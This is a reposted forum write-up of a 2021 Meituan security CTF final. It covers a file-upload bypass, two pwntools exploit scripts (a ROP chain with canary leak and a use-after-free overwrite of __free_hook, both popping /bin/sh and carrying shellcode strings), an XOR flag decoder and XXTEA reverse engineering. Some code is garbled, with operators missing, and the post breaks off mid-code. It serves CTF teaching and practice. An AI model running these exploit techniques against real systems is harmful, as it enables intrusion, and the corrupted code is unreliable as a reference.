Jump to content

Title: 2021 4th Meituan Cyber Security College Challenge Finals writeup (transfer)

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Web

HackMe

At the beginning, a file is uploaded, and the encoding of utf-16 is bypassed, and then the file name is blasted according to the prompt. Blast the last four digits 0000-9999 can be accessed. Note that it is 12 hours.

Pwn

babyrop

DEBUG

# _*_ coding:utf-8 _*_

from pwn import *

import numpy as np

context.log_level='debug'

#context.terminal=['tmux', 'splitw', '-h']

prog='./babyrop'

#elf=ELF(prog)

p=process(prog)#,env={'LD_PRELOAD':'./libc-2.27.so'})

libc=ELF('./libc-2.27.so')

#p=remote('123.57.207.81',44823)

def debug(addr,PIE=False):

debug_str=''

if PIE:

text_base=int(os.popen('pmap {}| awk '{{print $1}}''.format(p.pid)).readlines()[1], 16)

for i in addr:

debug_str+='b *{}\n'.format(hex(text_base+i))

gdb.attach(p,debug_str)

else:

for i in addr:

debug_str+='b *{}\n'.format(hex(i))

gdb.attach(p,debug_str)

def dbg():

gdb.attach(p)

#-----------------------------------------------------------------------------------------

s=lambda data :p.send(str(data)) #in case that data is an int

sa=lambda delim,data :p.sendafter(str(delim), str(data))

sl=lambda data :p.sendline(str(data))

sla=lambda delim,data :p.sendlineafter(str(delim), str(data))

r=lambda numb=4096 :p.recv(numb)

ru=lambda delims, drop=True :p.recvuntil(delims, drop)

it=lambda :p.interactive()

uu32=lambda data :u32(data.ljust(4, '\0'))

uu64=lambda data :u64(data.ljust(8, '\0'))

bp=lambda bkp :pdbg.bp(bkp)

li=lambda str1,data1 :log.success(str1+'========'+hex(data1))

def dbgc(addr):

gdb.attach(p,'b*' + hex(addr) +'\n c')

def lg(s,addr):

print('\033[1;31;40m%20s--0x%x\033[0m'%(s,addr))

sh_x86_18='\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'

sh_x86_20='\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'

sh_x64_21='\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05'

#https://www.exploit-db.com/shellcodes

#-----------------------------------------------------------------------------------------sa('name? \n','a'*0x19)

debug([0x400752])

main=0x40075b

val=0x400717

read_plt=0x400600

bss=0x601010

puts_got=0x600fc0

puts_plt=0x4005d0

printf_plt=0x4005f0

sa('name? \n','a'*0x19)

ru('a'*0x19)

rdi=0x400913

canary=(uu64(ru(',')[0:7]))8

lg('canary',canary)

sla('his challenge\n',str(0x4009ae))

pay=(p64(0x601010+8)*3)

sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x40075c))

sleep(0.5)

#pay=p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(val)+'\n'

#s(pay)

sa('name? \n',p64(rdi)+p64(puts_plt)+p64(0x40075b)+'\n')

sla('his challenge\n',str(0x4009ae))

pay=p64(puts_plt)+p64(0x400717)+'a'*8

sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x40075c))

sa('name? \n',p64(rdi)+p64(0x600fc0)+p64(0x0000000000040090c)+'\n')

sla('his challenge\n',str(0x4009ae))

pay=p64(puts_plt)+p64(0x400717)+'a'*8

sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x0000400911))

libc_base=uu64(ru('\x7f',drop=False)[-6:])-(0x7f23ededeaa0-0x7f23ede5e000)

lg('libc_base',libc_base)

sa('name? \n',p64(rdi)+p64(libc.search('/bin/sh').next()+libc_base)+p64(libc_base+libc.sym['system'])+'\n')

sla('his challenge\n',str(0x4009ae))

pay=p64(puts_plt)+p64(0x400717)+'a'*8

sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x00000000000400911))

lg('libc_base',libc_base)

it()

bookshop

UAF fastbin+tcache

# _*_ coding:utf-8 _*_

from pwn import *

context.log_level='debug'

prog='./bookshop'

#elf=ELF(prog)

p=process(prog)#,env={'LD_PRELOAD':'./libc-2.27.so'})

libc=ELF('./libc-2.31.so')

#p=remote('123.57.132.168',30042)

def debug(addr,PIE=True):

debug_str=''

if PIE:

text_base=int(os.popen('pmap {}| awk '{{print $1}}''.format(p.pid)).readlines()[1], 16)

for i in addr:

debug_str+='b *{}\n'.format(hex(text_base+i))

gdb.attach(p,debug_str)

else:

for i in addr:

debug_str+='b *{}\n'.format(hex(i))

gdb.attach(p,debug_str)

def dbg():

gdb.attach(p)

#-----------------------------------------------------------------------------------------

s=lambda data :p.send(data) #in case that data is an int

sa=lambda delim,data :p.sendafter(delim, data)

sl=lambda data :p.sendline(data)

sla=lambda delim,data :p.sendlineafter(delim, data)

r=lambda numb=4096 :p.recv(numb)

ru=lambda delims, drop=True :p.recvuntil(delims, drop)

it=lambda :p.interactive()

uu32=lambda data :u32(data.ljust(4, '\0'))

uu64=lambda data :u64(data.ljust(8, '\0'))

bp=lambda bkp :pdbg.bp(bkp)

li=lambda str1,data1 :log.success(str1+'========'+hex(data1))

def dbgc(addr):

gdb.attach(p,'b*' + hex(addr) +'\n c')

def lg(s,addr):

print('\033[1;31;40m%20s--0x%x\033[0m'%(s,addr))

sh_x86_18='\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'

sh_x86_20='\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'

sh='\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05'

#https://www.exploit-db.com/shellcodes

#-----------------------------------------------------------------------------------------

def choice(idx):

sla(' ',str(idx))

def add(con):

choice(1)

sla(' ',con)

def delete(idx):

choice(2)

sla('bag?',str(idx))

def show(idx):

choice(3)

sla('read?',str(idx))

def exp():

sla('number?',str(0x68))

for i in range(10):

add(6*(p64(0)+p64(0x71)))

add(p64(0)*4+(p64(0x421)+p64(0x41)))

for i in range(7):

delete(i)

delete(8)

show(1)

ru('Content:')

heap=uu64(ru('\n')[-6:])

lg('heap',heap)

for i in range(7):

add(6*(p64(0)+p64(0x71)))

delete(8)

add(p64(heap+0x40))

add(p64(0))

add(p64(0)*3+p64(0x421))

lg('heap',heap+0x40)

#dbg()

delete(1)

show(1)

libc_base=uu64(ru('\x7f',drop=False)[-6:])-(0x7f3f97308be0-0x7f3f9711d000)

lg('libc',libc_base)

fh=libc_base + libc.sym['__free_hook']

sys=libc_base + libc.sym['system']

delete(2)

delete(20)

delete(0)

add(p64(fh)*12)

add('/bin/sh\x00')

add(p64(sys))

delete(22)

it()

if __name__=='__main__':

exp()

Re

Random

Direct debugging to find that the key remains unchanged

q=[0x3E,0xCD,0xAA,0x8E,0x96,0x1F,0x89,0xCD,0xDB,0xF1,

0x70,0xF2,0xA9,0x9C,0xC2,0x8B,0xF2,0xFE,0xAD,0x8B,

0x58,0x7C,0x2F,0x03,0x4A,0x65,0x31,0x89,0x76,0x57,

0x88,0xDF,0xB8,0xE9,0x01,0xE9,0xDE,0xE5,0x86,0x68,

0x8F,0x24,0xD3,0x5A]

k=[0x58,0xa1,0xcb,0xe9,0xed,0x2c,0xec,0xfb,0xe9,0xc4,0x16,0x97,0x99,0xb1,0xa4,0xe9,0xc3,0xc6,0x80,0xbf,0x3e,0x44,0x18,0x2e,0x73,0x56,0x52,0xb8,0x5b,0x66,0xed,0xbc,0x8a,0xd8,0x36,0x8f,0xe6,0xd3,0xb1,0x51,0xb9,0x59,0xd3,0x5a]

f=''

for i in range(len(k)):

f+=chr(q[i]^k[i])

print f

flag{3e625fe0-fb18-4f87-93c1-1ec217f86796}

wow

upx -d unshelled

Patch this section

.text:00402352 call $+5

.text:00402357 add [esp+4+var_4], 6

.text:0040235B dec eax

.text:0040235C retfint __cdecl main(int argc, const char **argv, const char **envp)

{

int *v3; //esi

int *v4; //ebp

int v5; //ecx

int v6; //ebp

int v7; //esi

int v8; //ecx

int v9; //edi

unsigned int i; //ebx

unsigned int v11; //ecx

unsigned int v12; //edx

unsigned int v13; //ecx

int *v15; //[esp+10h] [ebp-68h]

int v16; //[esp+2Ch] [ebp-4Ch]

int v17; //[esp+30h] [ebp-48h]

int v18; //[esp+34h] [ebp-44h]

char v19[24]; //[esp+38h] [ebp-40h] BYREF

char v20[24]; //[esp+50h] [ebp-28h] BYREF

int v21; //[esp+74h] [ebp-4h]

int savedregs; //[esp+78h] [ebp+0h] BYREF

v4=savedregs;

sub_4024C0(v20);

v21=0;

sub_402740(dword_42AFD0, v20);

scanf(v19, input);

LOBYTE(v21)=1;

if ( strlen(v20) !=36 )

{

printf((int)unk_42AE80, 'wrong\n');

v17=0;

v16=0;

LABEL_9:

*((_BYTE *)v4 - 4)=0;

sub_402430(v4 - 16);

*(v4 - 1)=-1;

sub_402430(v4 - 10);

return *(v4 - 19);

}

v18=sub_402420(v20);

v15=v3;

v5=*(_DWORD *)(v18 + 34);

v6=12;

v7=0;

do

{

v7 +=0x67452301;

v8=v5 - 1;

v9=v7 + 4;

for ( i=0; i 8; ++i )

{

v11=v8 + 2;

v12=(((v11 + 1) 3) + (v7 ^ (16 * (v11 + 1)))) ^ ((((((v11 + 1) 3) + (v7 ^ (16 * (v11 + 1)))) ^ ((v11 + 1) 3))

+ ((v11 5) ^ (4 * v11)));

*(_DWORD *)v12 +=v12;

v6 +=2;

v9 +=4;

v8=*(_DWORD *)v12 + 1;

}

v13=*(_DWORD *)v12 + 3;

*(_DWORD *)(v7 + 32) +=((((v13 + 1) 3) + (v7 ^ (16 * (v13 + 1)))) ^ ((((((v13 + 1) 3) + (v7 ^ (16 * (v13 + 1)))) ^ ((v13 + 1) 3))

+ ((v13 5) ^ (4 * v13)));

v5=*(_DWORD *)(v7 + 32);

v6 +=2;

}

while ( v6 );

v4=v15;

if ( sub_4029F0(v15 - 10, v15 - 16) )

{

printf((int)unk_42AE80, 'right\n');

*(v15 - 19)=0;

goto LABEL_9;

}

printf((int)unk_42AE80, 'wrong\n');

*((_BYTE *)v15 - 4)=0;

sub_402430(v15 - 16);

*(v15 - 1)=-1;

return sub_402430(v15 - 10);

}

It's almost xxtea encryption

Look at the assembly and find key=[0xEFCDAB89,0x10325476,0x98BADCFE,0xC3D2E1F0]

DELTA0x67452301

Secret text

0xD8F758F5,0x526849DB,0xE2D72563,0x485EEFAC,0x608F4BC6,0x5859F76A,0xB03565A3,0x3E4091C1,0xD3DB5B9A

Find a script online to decrypt

#include stdio.h

#include stdint.h

#define DELTA0x67452301

#define MX (((z5^y2) + (y3^z4)) ^ ((sum^y) + (key[(p3)^e] ^ z)))

void xxtea(uint32_t* v, int n, uint32_t* key)

{

uint32_t y, z, sum;

unsigned p, rounds, e;

if (n &g

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.